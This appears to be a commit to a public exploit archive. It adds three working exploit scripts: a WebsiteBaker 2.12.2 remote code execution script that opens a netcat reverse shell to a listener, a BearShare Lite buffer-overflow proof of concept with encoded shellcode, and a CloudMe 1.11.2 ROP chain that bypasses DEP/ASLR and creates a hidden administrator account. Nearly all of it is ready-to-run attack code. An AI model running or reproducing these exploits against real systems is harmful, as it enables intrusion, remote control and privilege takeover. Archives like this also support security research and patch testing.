DB: 2020-09-30

3 changes to exploits/shellcodes BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC) CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR) WebsiteBaker 2.12.2 - Remote Code Execution
2020-09-30 05:02:05 +00:00 · 2020-09-30 05:02:05 +00:00 · fdab02c0ff
commit fdab02c0ff
parent 345eb88be8
4 changed files with 470 additions and 0 deletions
--- a/exploits/php/webapps/48838.py
+++ b/exploits/php/webapps/48838.py
@ -0,0 +1,108 @@
+# Exploit Title: WebsiteBaker 2.12.2 - Remote Code Execution
+# Date: 2020-07-04
+# Exploit Author: Selim Enes 'Enesdex' Karaduman
+# Vendor Homepage: https://websitebaker.org/pages/en/home.php
+# Software Link: https://wiki.websitebaker.org/doku.php/downloads
+# Version: 2.12.2
+# Tested on: Windows 10 and Ubuntu 18.04 
+# Note : You start listener before execute (e.g netcat) then procide listener ip and port
+
+import requests
+import re
+from bs4 import BeautifulSoup
+import sys
+import getopt
+
+options, remainder = getopt.gnu_getopt(sys.argv[1:], 'ht:u:p:i:l:',['lhost=','lport='])
+
+for opt, arg in options:
+    if opt in ('-h'): 
+        print('Usage: python exploit.py -t TARGET_URL -u USERNAME -p PASSWORD --lhost LISTENER_IP --lport LISTENER_PORT')
+        exit()
+    elif opt in ('-t'):
+        main_url = arg
+    elif opt in ('-u'):
+        usr = arg
+    elif opt in ('-p'):
+        passwd = arg
+    elif opt in ('-i', '--lhost'):
+    	lhost = arg
+    elif opt in ('-l' , '--lport'):
+    	lport = arg
+
+reverse_shell_code = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc"+" "+lhost+" "+lport +" "+">/tmp/f"
+shell_code_eval = "echo system('"+ reverse_shell_code + "');"
+
+
+print("Exploit Author: Selim Enes 'Enesdex' Karaduman" + " " + "@enesdex" + "\n")
+##LOGIN PAGE HTML PARSE FOR LOGIN PARAMS
+url = main_url+"/admin/login/index.php"
+req = requests.get(url)
+
+login_page = req.text
+soup = BeautifulSoup(login_page, 'html.parser')
+username_par = soup.find_all(attrs={"type" : "hidden"})[1]['value']
+password_par = soup.find_all(attrs={"type" : "hidden"})[2]['value']
+weird_par = soup.find_all(attrs={"type" : "hidden"})[3]['name']
+weird_val = soup.find_all(attrs={"type" : "hidden"})[3]['value']
+
+#LOGIN TO GET SESSIoN_COOKIE
+login_page = requests.Session()
+
+burp0_url = main_url+"/admin/login/index.php"
+burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
+burp0_data = {"url": '', "username_fieldname": username_par, "password_fieldname": password_par, weird_par : weird_val, username_par : usr,  password_par : passwd, "submit": ''}
+r = login_page.post(burp0_url, headers=burp0_headers, data=burp0_data,allow_redirects = False)
+
+cok = r.headers['Set-Cookie']
+cok = cok.split(' ')[0]  
+cookie_par = cok.split('=')[0]
+cookie_val = cok.split('=')[1].replace(';','')
+session_cookie = cookie_par + "=" + cookie_val
+
+
+##ADD PAGE HTML PARSE FOR CREATE PAGE PARAMS
+url = main_url+"/admin/pages/index.php"
+cookies = {cookie_par : cookie_val}
+req = requests.get(url, cookies=cookies)
+create_page = req.text
+soup = BeautifulSoup(create_page, 'html.parser')
+weird_par1 = soup.find_all(attrs={"type" : "hidden"})[0]['name']
+weird_val1 = soup.find_all(attrs={"type" : "hidden"})[0]['value']
+
+##Create Code Page to Put Shell Code
+create_page = requests.session()
+
+burp0_url = main_url+"/admin/pages/add.php"
+burp0_cookies = {cookie_par : cookie_val}
+burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
+burp0_data = {weird_par1: weird_val1, "title": "exploit-shell", "type": "code", "parent": "0", "visibility": "public", "submit": "Add"}
+c = create_page.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
+
+##FIND THE PAGE ID
+url = main_url+"/admin/pages/index.php"
+cookies = {cookie_par : cookie_val}
+req = requests.get(url, cookies=cookies)
+find_id = req.text
+soup = BeautifulSoup(find_id, 'html.parser')
+pageid = soup.find_all('option',string='exploit-shell')[0]['value']
+
+##HTML PARSE TO PUT SHELL CODE
+url = main_url+'/admin/pages/modify.php?page_id='+pageid
+cookies = {cookie_par : cookie_val}
+req = requests.get(url, cookies=cookies)
+add_shellcode = req.text
+soup = BeautifulSoup(add_shellcode, 'html.parser')
+weird_par2 = soup.find_all(attrs={"type" : "hidden"})[3]['name']
+weird_val2 = soup.find_all(attrs={"type" : "hidden"})[3]['value']
+
+##ADD SHELL CODE
+session = requests.session()
+
+burp0_url = main_url+"/modules/code/save.php"
+burp0_cookies = {cookie_par : cookie_val}
+burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
+burp0_data = {"page_id": pageid, "section_id": pageid, weird_par2: weird_val2, "content": shell_code_eval}
+a = session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
+
+last_req = requests.get(main_url+"/pages/exploit-shell.php", cookies=cookies)
--- a/exploits/windows/local/48839.py
+++ b/exploits/windows/local/48839.py
@ -0,0 +1,40 @@
+# Title: BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC)
+# Date: 2020-09-29
+# Author: Christian Vierschilling
+# Vendor Homepage: http://www.bearshareofficial.com/
+# Software Link: http://www.oldversion.com.de/windows/bearshare-lite-5-2-5
+# Versions: 5.1.0 - 5.2.5
+# Tested on: Windows 10 x64 EN/DE
+# CVE: NA
+
+# --- EXPLOTATION INSTRUCTIONS --- #
+# 1. Adjust the values for "jmp_esp" and "shellcode" if needed
+# 2. Run the script to generate a file pwn.txt, containing your payload
+# 3. Open pwn.txt on your target (!!) (e.g. in the browser or locally) and copy the contents into the clipboard
+# 4. Start BearShare, click on "Advanced..." and a new window will pop up. Put the payload from pwn.txt into the field "Keywords:" within the new window. Click on "Search" in this window and your payload will be executed.
+
+# --- PAYLOAD CONSTRUCTION --- #
+#!/usr/bin/python
+import binascii
+
+# Detected the offset for overwriting the EIP register using pattern_create and pattern_offset: [*] Exact match at offset 524
+junk1 = 524*"A"
+
+# Address for a JMP ESP instruction found in MSVBVM60.DLL using mona.py (You will probably need to adjust this if using another OS, language etc.)
+# \x66\x06\x05\x35
+jmp_esp = binascii.unhexlify('35050666')
+
+# Using another 4 bytes to align the stack for clean shellcode execution
+junk2 = 4*"B"
+
+# As we are limited to only being able to insert alphanumeric characters, we'll create an appropriate shellcode using msfvenom. Copy the output off the following command into the variable "shellcode" below:
+# msfvenom -p windows/exec cmd=calc.exe BufferRegister=esp -e x86/alpha_mixed
+shellcode = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylm8k2s0C0ePsPmYKUFQKpu4nk2ptpLKf26lLK3bTTNk1bexVoH7aZWVuaiollUl3QSLtBTlepyQZofmWqZgIrjRqBrwlKRrvpLK3zgLnkbl4Qt8hc3xc1HQv1lK2ya05QkcLK3ytXzCtzg9LKednkvaN6UaioNLzaZotM7qzgvXkPQeJVEScMIhWKQmq4T5xdChnkcha47qYCPfnkFlpKlKaHeLgqjsnk6dLKc1HPlI0Da4FDqKSkE1V9CjcaYoypcoaO0ZlKTRZKnm3msZ7qnmMUX230s05Pbpe8dqNkPoMWkO9EMkHpmenBcfU8MvnuMmMMKO9EelTFQlEZK0Ikm0puWumk1WuCD2PosZ7p1CyoxU3Se1bLbCDn55qhCUuPAA"
+
+# assemble payload
+payload = junk1 + jmp_esp + junk2 + shellcode
+
+# write payload into pwn.txt
+f = open("pwn.txt", 'w')
+f.write(payload)
+f.close()
--- a/exploits/windows/local/48840.py
+++ b/exploits/windows/local/48840.py
@ -0,0 +1,319 @@
+# Exploit Title: CloudMe 1.11.2 - Buffer Overflow ROP (DEP,ASLR)
+# Exploit Author:  Bobby Cooke (boku)
+# CVE:             CVE-2018-6892
+# Date: 2020-09-29
+# Vendor Homepage: https://www.cloudme.com/
+# Software Link:   https://www.cloudme.com/downloads/CloudMe_1112.exe
+# Version:         1.11.2
+# Tested On:       Windows 10 (x64) - 10.0.19041 Build 19041
+# Script:          Python 2.7
+# Notes:
+#   This exploit uses MSVCRT.System to create a new user (boku:0v3R9000!) and add the new user to the 
+#   Administrators group. A requirement of successful exploitation is the CloudMe.exe process must be 
+#   running as adminstrator, such as when ran with 'Run as Administrator'; as this permission is required 
+#   to create new users on the system. This exploit has been tested against multiple Windows 10 systems 
+#   including x86, x64, Pro, Education, Home; although there is no guarantee it will work in your CTF.
+
+# CloudMe 1.11.2 - Turing Complete Add-Admin ROP (DEP,ASLR)
+import os,sys,socket,struct
+from colorama import Fore, Back, Style
+
+F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]
+B = [Back.RESET,Back.BLACK,Back.RED,Back.GREEN,Back.YELLOW,Back.BLUE,Back.MAGENTA,Back.CYAN,Back.WHITE]
+S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
+ok   = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0]
+err  = S[3]+F[2]+'<========'+F[2]+'['+F[5]+'+++'+F[2]+'( '+F[0]+S[0]
+def formatMsg(STRING):
+    return ok+S[3]+F[5]+STRING+S[0]
+def formatErr(STRING):
+    return err+S[3]+F[2]+STRING+S[0]
+
+#   Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Modulename
+#  -------------------------------------------------------------------------------------------------------
+#   0x69900000 | 0x69ac1000 | False  | False   | False |  False   | False  | [Qt5Network.dll]
+#   0x6eb40000 | 0x6eb64000 | False  | False   | False |  False   | False  | [libgcc_s_dw2-1.dll]
+#   0x68a80000 | 0x69055000 | False  | False   | False |  False   | False  | [Qt5Core.dll]
+#   0x00400000 | 0x00831000 | False  | False   | False |  False   | False  | [CloudMe.exe]
+#   0x6d9c0000 | 0x6da0c000 | False  | False   | False |  False   | False  | [Qt5Sql.dll]
+#   0x64b40000 | 0x64b5b000 | False  | False   | False |  False   | False  | [libwinpthread-1.dll]
+#   0x66e00000 | 0x66e3d000 | False  | False   | False |  False   | False  | [Qt5Xml.dll]
+
+def getESP_RC():
+    GaDG3Tz = [
+    # ESP -> EDI
+    # Clobbers: BL # [EBX+5E5B10C4] must be writable # Requires ROPNOP
+    # Address=68F79000 Size=0007A000 (499712.) Owner=Qt5Core  68A80000 Section=.eh_fram Type=Imag 01001002 Access=RWE CopyOnWr 
+        0x68bb4678, # POP EBX # RETN [Qt5Core.dll] 
+        0x0A9C8F3C, # EBX + 0x5E5B10C4 = 0x68F7A000 = Writeable Memory
+        0x68d5e818, # PUSH ESP # OR BL,DL # INC DWORD PTR DS:[EBX+5E5B10C4] # POP EDI # RETN 0x04 [Qt5Core.dll]
+        0x68D50537, # RETN - ROPNOP
+        0x68D50537  # RETN - ROPNOP
+    ]
+    print(formatMsg("Get ESP ROP Chain built!"))
+    return ''.join(struct.pack('<I', _) for _ in GaDG3Tz)
+
+def msvcrt_rop_chain():
+    GaDG3Tz = [
+    # HMODULE LoadLibraryA( LPCSTR lpLibFileName);
+    # $ ==>    >  CALL to LoadLibraryA
+    # $+4      >  FileName = "msvcrt.dll"
+      # EAX = 0x512 = 1298
+        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
+        0xFFFFFAEE, # NEG FFFFFAEE = 0x512
+        0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
+      # EDI + EAX = End of string "msvcrt.dll"
+        0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] 
+      # EAX = 0x01
+        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
+        0xFFFFFFFF, # NEG FFFFFFfF = 0x01
+        0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
+      # EAX = 0x0
+        0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll]
+      # ECX = 0x0
+        0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] 
+      # Terminate String "msvcrt.dll"
+        0x68cee06d, # XOR ESI,ESI # RETN  [Qt5Core.dll]  (Clear ESI)
+        0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI)
+        0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll]
+      # EAX = -0xA = 0xFFFFFFF6
+        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
+        0xFFFFFFF6, # -0xA
+      # ESI = Start of string "msvcrt.dll\x00"
+        0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll]
+      # EAX = PTR LoadLibraryA (from CloudMe Import Table)
+        # CloudMe Address=0081A168 Section=.idata Type=Import  (Known) Name=KERNEL32.LoadLibraryA
+        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
+        0xFF7E5E98, # NEG FF7E5E98 = 0081A168 = PTR Kernel32.LoadLibraryA
+        0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
+      # EAX = kernel32.LoadLibraryA
+        0x699030c5, # mov eax,dword ptr ds:[eax] [Qt5Network.dll] 
+      # ESI = kernel32.LoadLibraryA # EAX = Addr string "msvcrt.dll\x00"
+        0x68d50536, # XCHG EAX,ESI # RETN [Qt5Core.dll]
+      # For PUSHAD we need: EDI=FarRETN # ESI=&LoadLibraryA # EAX=["msvcrt.dll"] # ECX=ROPNOP
+        0x68d32800, # POP ECX # RETN [Qt5Core.dll]
+        0x68D50537, # RETN - ROPNOP
+        0x699f37ad, # POP EDI # RETN [Qt5Network.dll]
+        0x6990F972, # RETN 10 [Qt5Network.dll] 
+        0x68f7bc5e, # pushad # ret # [Qt5Core.dll]
+      # EAX -> EBP = msvcrt.dll
+        0x68cc462c  # XCHG EAX,EBP # RETN [Qt5Core.dll]
+    # EBP = msvcrt.dll
+   ]
+    print(formatMsg("LoadLibraryA(LPSTR \"msvcrt.dll\") ROP Chain built!"))
+    return ''.join(struct.pack('<I', _) for _ in GaDG3Tz)
+
+def GetProc_system_rop_chain():
+    GaDG3Tz = [
+    # FARPROC GetProcAddress( HMODULE hModule, LPCSTR  lpProcName);
+    #   $ ==>    >   CALL to GetProcAddress      # EDX (ROPNOP)
+    #   $+4      >   hModule = [msvcrt]          # ECX
+    #   $+8      >   ProcNameOrOrdinal  (system) # EAX
+      # EAX = 0x4a2 = 1186
+        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
+        0xFFFFFB5E, # NEG FFFFFB5E = 0x4A2
+        0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
+      # EDI + EAX = End of string "system"
+        0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] 
+      # EAX = 0x01
+        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
+        0xFFFFFFFF, # NEG FFFFFFfF = 0x01
+        0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
+      # EAX = 0x0
+        0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll]
+      # ECX = 0x0
+        0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]
+      # Terminate String "system"
+        0x68cee06d, # XOR ESI,ESI # RETN  [Qt5Core.dll]  (Clear ESI)
+        0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI)
+        0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll]
+      # EAX = -0x6 = 0xFFFFFFFA
+        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
+        0xFFFFFFFA, # -0x6
+      # ESI = Start of string "system\x00"
+        0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll]
+        0x68fcf58d, # DEC EBP # RETN [Qt5Core.dll](fix EBP for prev gadgets) 
+      # EAX = PTR GetProcAddr (from CloudMe Import Table)
+        # CloudMe Address=0081A148 # Section=.idata # Type=Import # Name=KERNEL32.GetProcAddress
+        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
+        0xFF7E5EB8, # NEG FF7E5EB8 = 0081A148 = PTR Kernel32.GetProcAddr
+        0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
+        0x699030c5, # mov eax,dword ptr ds:[eax] [Qt5Network.dll] 
+        0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll]
+        0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]
+        # ESI = &kernel32.GetProcAddr # ECX=["system\x00"]# EBP=msvcrt.dll 
+      # For PUSHAD we need: EDI=FarRETN # ESI=&GetProcAddress # ECX=msvcrt.dll # EAX=["system"]# EDX=ROPNOP
+        # EBP -> EAX = msvcrt.dll
+        0x68cc462c, # XCHG EAX,EBP # RETN [Qt5Core.dll]
+        # ECX=&msvcrt.dll # EAX=["system\x00"]
+        0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]
+        # EDX=ROPNOP
+        0x68f94685, # POP EDX # RETN [Qt5Core.dll]
+        0x68D50537, # RETN - ROPNOP
+        # EDI=FarRETN
+        0x699f37ad, # POP EDI # RETN [Qt5Network.dll]
+        0x699010B4, # ret 0C [Qt5Network.dll] 
+                    #    KERNEL32.GetProcAddress      [ESI pushed to stack]
+                    #                                 [EBP pushed to stack]
+                    #                                 [ESP pushed to stack]
+                    #                                 [EBX pushed to stack]
+# land after ret 0xC ->  Qt5Core.68D50537 (ROPNOP)    [EDX pushed to stack]
+                    #    MSVCRT.75F60000              [ECX pushed to stack]
+                    #    ASCII "system"               [EAX pushed to stack]
+        0X68f7bc5e, # pushad # ret # [Qt5Core.dll]
+        0x68b1df17  # XCHG EAX,EDX # RETN # [Qt5Core.dll]
+    # EDX = msvcrt.system
+   ]
+    print(formatMsg("GetProcAddress(HMODULE msvcrt, LPCSTR system) ROP Chain built!"))
+    return ''.join(struct.pack('<I', _) for _ in GaDG3Tz)
+
+def addUsr_rop_chain():
+    GaDG3Tz = [
+    # int system( const char *command);
+    # $ ==>    > CALL to system
+    # $+4      > command = "net user boku 0v3R9000! /add"
+      # EAX = 0x438 = 1080 
+        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
+        0xFFFFFBC8, # NEG 0xFFFFFBC8 = 0x438
+        0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
+      # EDI + EAX = End of string "net user..."
+        0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] 
+      # EAX = 0x01
+        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
+        0xFFFFFFFF, # NEG FFFFFFfF = 0x01
+        0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
+      # EAX = 0x0
+        0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll]
+      # ECX = 0x0
+        0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]
+      # Terminate String "net user..."
+        0x68cee06d, # XOR ESI,ESI # RETN  [Qt5Core.dll]  (Clear ESI)
+        0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI)
+        0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll]
+      # EAX = -28 = -0x1C = 0xFFFFFFE4
+        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
+        0xFFFFFFE4, #  -28 = -0x1C
+      # ESI = Start of string "net user...\x00"
+        0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll]
+        # EDX = MSVCRT.system # ECX=0x0
+      # For PUSHAD we need: EDI=FarRETN # ESI=MSVCRT.system # EAX=["net user.."] # ECX=POP+RET
+        0x68d32800, # POP ECX # RETN [Qt5Core.dll]
+        0x699f37ad, # POP EDI # RETN [Qt5Network.dll]
+        # ESI = MSVCRT.system # EAX = ["net user.."]
+        0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll]
+        0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll]
+        # EDI=FarRETN
+        0x699f37ad, # POP EDI # RETN [Qt5Network.dll]
+        0x6990F972, # RETN 10 [Qt5Network.dll] 
+        # PUSHAD - Setup Call to MSVCRT.system on stack
+        0X68f7bc5e  # pushad # ret # [Qt5Core.dll]
+   ]
+    print(formatMsg("system(const char* \"net user boku 0v3R9000! /add\") ROP Chain built!"))
+    return ''.join(struct.pack('<I', _) for _ in GaDG3Tz)
+ 
+def addAdm_rop_chain():
+    GaDG3Tz = [
+    # ESI = msvcrt.system
+        # ESI -> EDX
+        0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll]
+        0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll]
+      # EAX = 0x3F7 
+        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
+        0xFFFFFC09, # NEG 0xFFFFFC09 = 0x3F7
+        0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
+      # EDI + EAX = End of string "net local..."
+        0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] 
+      # EAX = 0x01
+        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
+        0xFFFFFFFF, # NEG FFFFFFfF = 0x01
+        0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
+      # EAX = 0x0
+        0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll]
+      # ECX = 0x0
+        0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]
+      # Terminate String "net local..."
+        0x68cee06d, # XOR ESI,ESI # RETN  [Qt5Core.dll]  (Clear ESI)
+        0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI)
+        0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll]
+      # EAX = -39 = -0x27 = 0xFFFFFFE4
+        0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
+        0xFFFFFFD9, #  -39 = -0x27
+      # ESI = Start of string "net local...\x00"
+        0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll]
+        # EDX = MSVCRT.system # ECX=0x0
+      # For PUSHAD we need: EDI=FarRETN # ESI=MSVCRT.system # EAX=["net local.."] # ECX=ROPNOP
+        0x68d32800, # POP ECX # RETN [Qt5Core.dll]
+        0x699f37ad, # POP EDI # RETN [Qt5Network.dll]
+        # ESI = MSVCRT.system # EAX = ["net local.."]
+        0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll]
+        0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll]
+        # EDI=FarRETN
+        0x699f37ad, # POP EDI # RETN [Qt5Network.dll]
+        0x6990F972, # RETN 10 [Qt5Network.dll] 
+        # PUSHAD - Setup Call to MSVCRT.system on stack
+        0X68f7bc5e  # pushad # ret # [Qt5Core.dll]
+   ]
+    print(formatMsg("system(const char* \"net localgroup Administrators boku /add\") ROP Chain built!"))
+    return ''.join(struct.pack('<I', _) for _ in GaDG3Tz)
+ 
+def sendRecv(s,p):
+    print(formatMsg("Sending payload: "))
+    print(S[3]+F[7]+payload+S[0])
+    s.send(p)
+    data = s.recv(1024)
+    return data
+
+def header():
+    head = S[3]+F[2]+'               --- Cloudme v1.12 | Add Admin (boku:0v3R9000!) ---\n'+S[0]
+    return head
+ 
+def sig():
+    SIG  = S[3]+F[4]+"                 .-----.._       ,--.\n"
+    SIG += F[4]+"                 |  ..    >  ___ |  | .--.\n"
+    SIG += F[4]+"                 |  |.'  ,'-'"+F[2]+"* *"+F[4]+"'-. |/  /__   __\n"
+    SIG += F[4]+"                 |      </ "+F[2]+"*  *  *"+F[4]+" \   /   \\/   \\\n"
+    SIG += F[4]+"                 |  |>   )  "+F[2]+" * *"+F[4]+"   /    \\        \\\n"
+    SIG += F[4]+"                 |____..- '-.._..-'_|\\___|._..\\___\\\n"
+    SIG += F[4]+"                     _______"+F[2]+"github.com/boku7"+F[4]+"_____\n"+S[0]
+    return SIG
+
+def footer():
+    foot = formatMsg('Requires that the Cloudme program is ran using \'Run As Administrator\'\n')
+    return foot
+
+if __name__ == "__main__":
+    print(header())
+    print(sig())
+    print(footer())
+    if len(sys.argv) != 3:
+        print(formatErr("Usage:   python %s <IP> <PORT>" % sys.argv[0]))
+        print(formaterr("Example: python %s '127.0.0.1' 8888" % sys.argv[0]))
+        sys.exit(-1)
+    host   = sys.argv[1]
+    port = int(sys.argv[2])
+
+    rop_chain = getESP_RC() + msvcrt_rop_chain() + getESP_RC() + GetProc_system_rop_chain() + getESP_RC() + addUsr_rop_chain() + getESP_RC() + addAdm_rop_chain()
+
+    os_EIP  = '\41'*1052
+    os_nSEH = '\x41'*(2344-len(os_EIP + rop_chain))
+    nSEH    = '\x42'*4
+    SEH     = '\x43'*4
+    buff    = os_EIP + rop_chain + os_nSEH + nSEH + SEH
+
+    term   = '\r\n'
+    kern32 = 'msvcrt.dll'+'AAAAAA'
+    winExe = 'system'+'BBBBBB'
+    addUsr = 'net user boku 0v3R9000! /add'+'CCCC'
+    addAdm = 'net localgroup Administrators boku /add'+'DDDD'
+    rmdr   = '\x44'*(3854-len(buff)-len(kern32)-len(winExe)-len(addAdm))
+    payload = buff + kern32 + winExe + addUsr + addAdm + rmdr + term
+
+    try:
+        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        sock.connect((host,port))
+        print(formatMsg( "Successfully connected to "+host+" on port "+str(port)))
+        resp = sendRecv(sock,payload)
+        print(formatMsg("Closing Socket"))
+        sock.close()
+        print(formatErr("Exiting python script."))
+    except:
+        print(formatErr("Failed to connect and send payload."))
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10384,6 +10384,8 @@ id,file,description,date,author,type,platform,port
 48815,exploits/windows/local/48815.txt,"Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software",2020-09-16,hyp3rlinx,local,windows,
 48821,exploits/windows/local/48821.txt,"ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path",2020-09-21,"Burhanettin Ozgenc",local,windows,
 48836,exploits/windows/local/48836.c,"MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation",2020-09-28,"Matteo Malvica",local,windows,
+48839,exploits/windows/local/48839.py,"BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC)",2020-09-29,"Christian Vierschilling",local,windows,
+48840,exploits/windows/local/48840.py,"CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)",2020-09-29,boku,local,windows,
 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@ -40661,6 +40663,7 @@ id,file,description,date,author,type,platform,port
 48834,exploits/multiple/webapps/48834.txt,"B-swiss 3 Digital Signage System 3.6.5 -  Database Disclosure",2020-09-25,LiquidWorm,webapps,multiple,
 48835,exploits/hardware/webapps/48835.py,"Mida eFramework 2.8.9 - Remote Code Execution",2020-09-28,elbae,webapps,hardware,
 48837,exploits/multiple/webapps/48837.txt,"Joplin 1.0.245 - Arbitrary Code Execution (PoC)",2020-09-28,"Ademar Nowasky Junior",webapps,multiple,
+48838,exploits/php/webapps/48838.py,"WebsiteBaker 2.12.2 - Remote Code Execution",2020-09-29,Enesdex,webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,